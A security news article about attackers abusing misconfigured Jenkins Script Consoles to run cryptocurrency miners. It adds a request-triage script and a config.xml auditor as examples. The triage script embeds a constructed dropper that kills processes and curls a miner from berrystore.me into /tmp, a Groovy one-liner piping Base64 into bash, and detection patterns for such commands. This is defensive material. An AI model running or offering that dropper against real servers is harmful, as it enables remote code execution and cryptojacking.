Jenkins Script Console used for cryptocurrency mining attacks by hackers



Trend Micro researchers found that attackers are exploiting improperly configured Jenkins Script Console instances for criminal activity such as cryptocurrency mining.

“Misconfigurations, such as weak authentication settings, expose the ‘/script’ endpoint,” noted Trend Micro’s Shubham Singh and Sunil Bharti. “This vulnerability can lead to remote code execution (RCE) and exploitation by malicious actors.”

All about Jenkins Script Console

Jenkins, a widely-used CI/CD platform, includes a Groovy script console enabling users to execute Groovy scripts within its controller runtime.

The official documentation explicitly warns that the web-based Groovy shell in Jenkins can access sensitive files (e.g., “/etc/passwd”), decrypt Jenkins credentials, and modify security settings.

According to the documentation, granting Script Console access to a Jenkins user is equivalent to granting them full administrative rights.

A misconfigured Jenkins instance can expose the “/script” (or “/scriptText”) endpoint to the internet with no authentication, letting an attacker run arbitrary Groovy on the controller and, through it, arbitrary operating-system commands under the Jenkins service account.

Trend Micro reported intrusions in which threat actors exploited misconfigured instances of the Jenkins Groovy plugin. Through the script console they executed a Base64-encoded string that decoded to a shell script for mining cryptocurrency on the compromised server. The script fetched a miner payload from berrystore[.]me and kept the miner running at full capacity by terminating other CPU-intensive processes as well as any stopped processes.
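The following triage script is an added example for this article, not code from the article, from Jenkins or from Trend Micro. It takes the form-encoded body that the Script Console receives on /script or /scriptText, extracts the “script” parameter, decodes any long Base64 run inside it, and looks for the behaviour described above: Groovy handing a command to the OS, a download, process killing, Base64 piped into a shell, and the defanged hosts from the IOC list. The request body and the decoded dropper are constructed for the example and are only parsed, never executed.

```python
"""Triage a Jenkins Script Console submission (the POST body sent to /script or /scriptText).

Added example for this article; it is not code from the article, from Jenkins or from
Trend Micro. The request body below is constructed to resemble the pattern the article
describes: a Groovy one-liner that pipes a Base64 blob into bash. The indicator hosts are
the defanged ones from the article's IOC list; the sample is never executed, only parsed.
"""
import base64
import re
from urllib.parse import parse_qs, urlencode

IOC_HOSTS = [h.replace("[.]", ".") for h in ("berrystore[.]me", "auto[.]c3pool[.]org")]

# Behaviour of the miner script described in the article, expressed as shell patterns.
SUSPICIOUS = {
    "downloads a payload": re.compile(r"\b(curl|wget)\b"),
    "kills other processes": re.compile(r"\b(kill|pkill|killall)\b"),
    "decodes base64 into a shell": re.compile(r"base64\s*(-d|--decode)\b|\{base64,-d\}"),
    "runs from a temp or hidden path": re.compile(r"/tmp/|/dev/shm/|/\.[A-Za-z0-9]"),
}
# Groovy reaches the OS through String.execute(), ProcessBuilder or Runtime.exec().
GROOVY_EXEC = re.compile(r"\.execute\s*\(|ProcessBuilder|Runtime\.getRuntime\(\)\.exec")
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")


def decode_blobs(text: str) -> list[str]:
    """Return every long Base64 run in text that decodes to valid UTF-8."""
    decoded = []
    for m in B64_BLOB.finditer(text):
        try:
            decoded.append(base64.b64decode(m.group(0), validate=True).decode("utf-8"))
        except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
            continue
    return decoded


def triage_script_request(body: str, path: str) -> dict:
    """Classify one form-encoded Script Console request as benign, suspicious or malicious."""
    script = parse_qs(body, keep_blank_values=True).get("script", [""])[0]
    decoded = decode_blobs(script)
    haystack = script + "\n" + "\n".join(decoded)
    indicators = [label for label, rx in SUSPICIOUS.items() if rx.search(haystack)]
    ioc_hosts = [h for h in IOC_HOSTS if h in haystack]
    executes_shell = GROOVY_EXEC.search(script) is not None
    if ioc_hosts or (executes_shell and len(indicators) >= 2):
        verdict = "malicious"
    elif executes_shell or indicators:
        verdict = "suspicious"
    else:
        verdict = "benign"
    return {"path": path, "verdict": verdict, "executes_shell": executes_shell,
            "indicators": indicators, "ioc_hosts": ioc_hosts, "decoded": decoded}


# Constructed sample: what the attacker's dropper might look like once decoded.
PAYLOAD_SH = (
    "#!/bin/bash\n"
    "# constructed stand-in for the miner dropper the article describes\n"
    "for p in $(ps -eo pid,pcpu --no-headers | awk '$2 > 50 {print $1}'); do kill -9 $p; done\n"
    "curl -fsSL https://berrystore.me/line-auth/cex -o /tmp/.x && chmod +x /tmp/.x\n"
    "/tmp/.x -o auto.c3pool.org:19999\n"
)
B64 = base64.b64encode(PAYLOAD_SH.encode()).decode()
MALICIOUS_GROOVY = 'def cmd = "bash -c {echo,%s}|{base64,-d}|{bash,-i}"\nprintln(cmd.execute().text)' % B64
MALICIOUS_BODY = urlencode({"script": MALICIOUS_GROOVY})
BENIGN_BODY = urlencode({"script": "println(Jenkins.instance.pluginManager.plugins.size())"})

if __name__ == "__main__":
    for body in (MALICIOUS_BODY, BENIGN_BODY):
        r = triage_script_request(body, "/scriptText")
        print(r["verdict"], r["indicators"], r["ioc_hosts"])
```

The verdict is a triage aid, not a whitelist: any Script Console call from a principal or source address you do not expect is worth investigating even when it scores “benign”, because the console itself is equivalent to administrator access.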

To mitigate such exploitation attempts, make sure the controller is configured correctly with strong authentication and a restrictive authorization strategy, audit those settings regularly, and never expose a Jenkins server directly to the public internet.
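The checks below are an added example for this article and are not code from the article or from Jenkins. They read a controller's config.xml and report the settings that, in practice, hand the Script Console to strangers: security switched off, the Unsecured authorization strategy, an anonymous or “authenticated” principal holding Administer in a matrix strategy, and the common pairing of “logged-in users can do anything” with open self-signup. The two config.xml samples are constructed, but the element names and class strings are the ones Jenkins writes to $JENKINS_HOME/config.xml (the real file also starts with an XML declaration, omitted here).

```python
"""Audit a Jenkins controller's config.xml for settings that hand out Script Console access.

Added example for this article; it is not code from the article or from Jenkins. The
config.xml samples are constructed, but the element names and class strings are the ones
Jenkins writes to $JENKINS_HOME/config.xml. Run it against a real file with
audit_jenkins_config(open(path).read()).
"""
import xml.etree.ElementTree as ET

ADMINISTER = "hudson.model.Hudson.Administer"


def _flag(elem, path, default):
    """Read a boolean-ish child element as a lower-cased string."""
    return elem.findtext(path, default=default).strip().lower()


def audit_jenkins_config(xml_text: str) -> list[str]:
    """Return a list of findings; an empty list means nothing obviously wrong."""
    root = ET.fromstring(xml_text)
    findings = []

    if _flag(root, "useSecurity", "true") != "true":
        # With security off every visitor is an administrator; nothing else matters.
        return ["useSecurity is false: /script and /scriptText are open to anyone"]

    strategy = root.find("authorizationStrategy")
    strategy_cls = strategy.get("class", "") if strategy is not None else ""
    if strategy is None or strategy_cls.endswith("AuthorizationStrategy$Unsecured"):
        findings.append("authorizationStrategy is missing or Unsecured: anonymous users are administrators")

    realm = root.find("securityRealm")
    signup_open = realm is not None and _flag(realm, "disableSignup", "true") == "false"
    if signup_open:
        findings.append("securityRealm allows self-signup: anyone who can reach the UI can create an account")

    if strategy_cls.endswith("FullControlOnceLoggedInAuthorizationStrategy"):
        if _flag(strategy, "denyAnonymousReadAccess", "false") != "true":
            findings.append("FullControlOnceLoggedIn without denyAnonymousReadAccess: anonymous can enumerate jobs")
        if signup_open:
            findings.append("FullControlOnceLoggedIn plus open signup: every self-registered account is an administrator")

    if "MatrixAuthorizationStrategy" in strategy_cls:
        for perm in strategy.iterfind("permission"):
            # Older controllers write "PERMISSION:sid", newer ones "USER:PERMISSION:sid" / "GROUP:PERMISSION:sid".
            parts = (perm.text or "").strip().split(":")
            if len(parts) < 2:
                continue
            name, sid = parts[-2], parts[-1]
            if name == ADMINISTER and sid in ("anonymous", "authenticated"):
                findings.append(f"matrix grants {ADMINISTER} to '{sid}': Script Console reachable by every {sid} user")
    return findings


# Constructed weak configuration: logged-in users get full control, and anyone can sign up.
WEAK_CONFIG = """
<hudson>
  <useSecurity>true</useSecurity>
  <authorizationStrategy class="hudson.security.FullControlOnceLoggedInAuthorizationStrategy">
    <denyAnonymousReadAccess>false</denyAnonymousReadAccess>
  </authorizationStrategy>
  <securityRealm class="hudson.security.HudsonPrivateSecurityRealm">
    <disableSignup>false</disableSignup>
  </securityRealm>
</hudson>
"""

# Constructed hardened configuration: one named administrator, read-only for everyone else.
HARDENED_CONFIG = """
<hudson>
  <useSecurity>true</useSecurity>
  <authorizationStrategy class="hudson.security.GlobalMatrixAuthorizationStrategy">
    <permission>USER:hudson.model.Hudson.Administer:alice</permission>
    <permission>GROUP:hudson.model.Hudson.Read:authenticated</permission>
  </authorizationStrategy>
  <securityRealm class="hudson.security.HudsonPrivateSecurityRealm">
    <disableSignup>true</disableSignup>
  </securityRealm>
</hudson>
"""

if __name__ == "__main__":
    for label, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(label, audit_jenkins_config(cfg) or ["no findings"])
```

The audit is deliberately narrow: it does not cover plugins that add their own authorization strategies (Role Strategy, for example), and a clean result still says nothing about whether the controller is reachable from the internet, which is the second half of the mitigation.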

This advice comes amid a surge in cryptocurrency theft in the first half of 2024, during which threat actors stole $1.38 billion, up from $657 million in the same period a year earlier.

“TRM Labs reported that the top five hacks and exploits accounted for 70% of the total amount stolen this year,” they added. “Compromises of private keys and seed phrases remain significant attack vectors in 2024, alongside exploits of smart contracts and flash loans.”

IOCs

[SHA256] [Detection name]

57fedfb431a717031f454d4fb2809d1f6d432a9edd900b07f0b9f9aca7fb3597 Coinminer.Linux.MALXMR.SMDSL64
07ca2a2e0d6ccfcef2cb010fe80a831c963755cc6179aaa95fe6e04d7d076c89
119cdc48db534c6093a24e78120c433480c5fb3f4a1a79270a78d9bf049fbe1c

[URL]

hxxps[:]//berrystore[.]me/line-auth/cex
hxxp[:]//auto[.]c3pool[.]org:19999


About the Author:

FirstHackersNews- Identifies Security
